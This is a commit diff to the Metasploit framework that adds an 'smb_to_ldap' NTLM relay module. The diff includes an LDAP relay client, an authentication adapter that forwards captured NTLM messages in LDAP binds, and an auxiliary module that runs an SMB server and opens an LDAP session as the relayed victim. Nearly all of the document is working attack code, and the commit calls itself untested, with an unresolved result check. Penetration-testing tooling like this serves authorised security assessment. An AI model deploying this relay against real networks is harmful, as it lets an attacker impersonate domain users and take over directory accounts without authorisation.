Add an untested smb_to_ldap relay module

Author: zeroSteiner

lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb

@@ -197,7 +197,7 @@ def relay_ntlmssp(session, incoming_security_buffer = nil)
 
       # Should never occur
       else
-        logger.error("Invalid ntlm request")
+        logger.error('Invalid NTLM message')
         RubySMB::Gss::Provider::Result.new(nil, WindowsError::NTStatus::STATUS_LOGON_FAILURE)
       end
     end
@@ -206,6 +206,8 @@ def create_relay_client(target, timeout)
       case target.protocol
       when :http, :https
         client = Target::HTTP::Client.create(self, target, logger, timeout)
+      when :ldap
+        client = Target::LDAP::Client.create(self, target, logger, timeout)
       when :smb
         client = Target::SMB::Client.create(self, target, logger, timeout)
       else

lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb

@@ -0,0 +1,77 @@
+require 'rex/proto/ldap/auth_adapter'
+
+module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP
+  # The LDAP Client for interacting with the relayed_target
+  # This isn't actually a Rex::Proto::LDAP::Client instance, but rather a Net::LDAP::Connection instance because of the
+  # state requirements of the relay operations
+  class Client < Net::LDAP::Connection
+    attr_accessor :timeout
+    attr_reader :target
+
+    def initialize(server, provider: nil, target: nil, logger: nil, timeout: DefaultConnectTimeout)
+      @logger = logger
+      @provider = provider
+      @target = target
+      @timeout = timeout
+
+      super(server)
+    end
+
+    def self.create(provider, target, logger, timeout)
+      new(
+        {
+          host: target.ip,
+          port: target.port,
+          connect_timeout: timeout
+        },
+        provider: provider,
+        target: target,
+        logger: logger
+      )
+    end
+
+    alias :disconnect! :close
+
+    # @param [String] client_type1_msg
+    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    def relay_ntlmssp_type1(client_type1_msg)
+      ntlm_message = Net::NTLM::Message.parse(client_type1_msg)
+      if ntlm_message.has_flag?(:SIGN)
+        logger.vprint_warning('Relay client\'s NTLM type 1 message requests signing, relaying to LDAP will not work')
+      end
+
+      pdu = bind(method: :rex_relay_ntlm, ntlm_message: client_type1_msg)
+
+      # todo: do something with this check
+      pdu.result_code == Net::LDAP::ResultCodeSaslBindInProgress
+
+      server_type2_message = pdu.result_server_sasl_creds.to_s
+
+      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
+        message: Net::NTLM::Message.parse(server_type2_message),
+        nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
+      )
+    end
+
+    # @param [String] client_type3_msg
+    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    def relay_ntlmssp_type3(client_type3_msg)
+      pdu = bind(method: :rex_relay_ntlm, ntlm_message: client_type3_msg)
+
+      case pdu.result_code
+      when Net::LDAP::ResultCodeSuccess
+        nt_status = WindowsError::NTStatus::STATUS_SUCCESS
+      when Net::LDAP::ResultCodeInvalidCredentials
+        nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
+      else
+        return nil
+      end
+
+      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
+    end
+
+    protected
+
+    attr_reader :logger
+  end
+end

lib/rex/proto/ldap/auth_adapter.rb

@@ -1,5 +1,6 @@
 require 'rex/proto/ldap/auth_adapter/rex_kerberos'
 require 'rex/proto/ldap/auth_adapter/rex_ntlm'
+require 'rex/proto/ldap/auth_adapter/rex_relay_ntlm'
 
 module Rex
   module Proto

lib/rex/proto/ldap/auth_adapter/rex_relay_ntlm.rb

@@ -0,0 +1,39 @@
+# frozen_string_literal: true
+
+require 'net/ldap/auth_adapter'
+require 'net/ldap/auth_adapter/sasl'
+require 'rubyntlm'
+
+module Rex::Proto::LDAP::AuthAdapter
+  # this implements NTLM authentication but facilitates operation from within a relay context where the NTLM processing
+  # is being handled by an external entity (the relay victim) and it expects to be called repeatedly with the necessary
+  # NTLM message
+  class RexRelayNTLM < Net::LDAP::AuthAdapter
+    # @param auth [Hash] the options for binding
+    # @option opts [String] :ntlm_message the serialized NTLM message to send to the server, the type does not matter
+    def bind(auth)
+      mech = 'GSS-SPNEGO'
+      ntlm_message = auth[:ntlm_message]
+      raise Net::LDAP::BindingInformationInvalidError, "Invalid binding information (invalid NTLM message)" unless ntlm_message
+
+      message_id = @connection.next_msgid
+
+
+      sasl = [mech.to_ber, ntlm_message.to_ber].to_ber_contextspecific(3)
+      request = [
+        Net::LDAP::Connection::LdapVersion.to_ber, "".to_ber, sasl
+      ].to_ber_appsequence(Net::LDAP::PDU::BindRequest)
+
+      @connection.send(:write, request, nil, message_id)
+      pdu = @connection.queued_read(message_id)
+
+      if !pdu || pdu.app_tag != Net::LDAP::PDU::BindResult
+        raise Net::LDAP::NoBindResultError, "no bind result"
+      end
+
+      pdu
+    end
+  end
+end
+
+Net::LDAP::AuthAdapter.register(:rex_relay_ntlm, Rex::Proto::LDAP::AuthAdapter::RexRelayNTLM)

modules/auxiliary/server/relay/smb_to_ldap.rb

@@ -0,0 +1,88 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include ::Msf::Exploit::Remote::SMB::RelayServer
+  include Msf::Auxiliary::CommandShell
+
+  def initialize
+    super({
+      'Name' => 'Relay: SMB to LDAP',
+      'Description' => %q{
+      },
+      'Author' => [
+        'bwatters-r7',
+        'Spencer McIntyre'
+      ],
+      'License' => MSF_LICENSE,
+      'Actions' => [[ 'Relay', { 'Description' => 'Run SMB relay server' } ]],
+      'PassiveActions' => [ 'Relay' ],
+      'DefaultAction' => 'Relay'
+    })
+
+    register_options(
+      [
+        Opt::RPORT(389)
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('RANDOMIZE_TARGETS', [true, 'Whether the relay targets should be randomized', true]),
+        OptInt.new('SessionKeepalive', [true, 'Time (in seconds) for sending protocol-level keepalive messages', 10 * 60])
+      ]
+    )
+
+    deregister_options('RHOSTS')
+  end
+
+  def relay_targets
+    Msf::Exploit::Remote::SMB::Relay::TargetList.new(
+      :ldap, # TODO: look into LDAPs
+      datastore['RPORT'],
+      datastore['RELAY_TARGETS'],
+      datastore['TARGETURI'],
+      randomize_targets: datastore['RANDOMIZE_TARGETS']
+    )
+  end
+
+  def check_options
+    if datastore['RHOSTS'].present?
+      print_warning('Warning: RHOSTS datastore value has been set which is not supported by this module. Please verify RELAY_TARGETS is set correctly.')
+    end
+  end
+
+  def run
+    check_options
+
+    start_service
+    print_status('Server started.')
+
+    # Wait on the service to stop
+    service.wait if service
+  end
+
+  def on_relay_success(relay_connection:, relay_identity:)
+    print_good('Relay succeeded')
+    # Create a new session
+    client = Rex::Proto::LDAP::Client.new(
+      host: relay_connection.target.ip,
+      port: relay_connection.target.port,
+      auth: { method: :rex_relay_ntlm },
+      connect_timeout: relay_connection.timeout
+    )
+    client.connection = relay_connection
+
+    my_session = Msf::Sessions::LDAP.new(relay_connection.socket, { client: client, keepalive_seconds: datastore['SessionKeepalive'] })
+
+    domain, _, username = relay_identity.partition('\\')
+    merge_me = {
+      'DOMAIN' => domain,
+      'USERNAME' => username
+    }
+
+    start_session(self, nil, merge_me, false, my_session.rstream, my_session)
+  end
+end